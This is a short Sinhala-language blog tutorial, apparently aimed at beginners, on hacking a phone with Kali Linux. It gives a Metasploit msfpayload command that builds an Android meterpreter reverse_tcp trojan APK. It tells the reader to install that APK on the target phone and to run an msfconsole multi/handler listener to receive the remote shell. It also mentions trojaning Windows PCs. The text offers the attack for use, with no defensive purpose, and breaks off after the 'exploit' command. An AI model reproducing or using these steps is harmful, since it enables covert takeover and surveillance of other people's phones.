Phone Hacking සිංහලෙන්
   ඔන්න අද මන් ඔයාලට කියල දෙන්න යන්නේ Phone එකක් Hack කරන හැටි.අද මන් මේකට භාවිතා කරන්නේ Kali Linux එක    Kali Linux කියන්නේ මොකක්ද? මෙතනින් ගිහින් පරණ Post එක කියවන්න      Kali Linux එක එකට දාන හැටි බලන්න මෙතනින් යන්න Click Here     අපි මේකට අද භාවිතා කරන්නේ කෙනෙක් Trojan Horse    ShadowNet එකෙන් ඔයාලට කලින් කියල දුන්නා කොහොමද Windows  වලින් තවත් Windows PC එකකට Trojan යවන්නේ කියල. Click Here To watch IT      මුලින්ම  Terminal  එක  Open කරගෙන මේ Code එක ගහන්න  msfpayload android/meterpreter/reverse_tcp LHOST=***.***.*.* R > /root/ShN.apk   ###.###.#.#  තියන තැනට ඔයාගේ IP එක ගහන්න  Eg:- 192.168.1.1   දැන් ඔය APK එක Phone එකට install කරන්න.       තව  Terminal එකක් Open කරගන්න.       මේ Code ගහන්න                                                                                            msfconsole  use exploit/multi/handler    et payload android/meterpreter/reverse_tcp  set LHOST ###.###.#.#     <Enter Your IP>     exploit   හොදයි දැන්...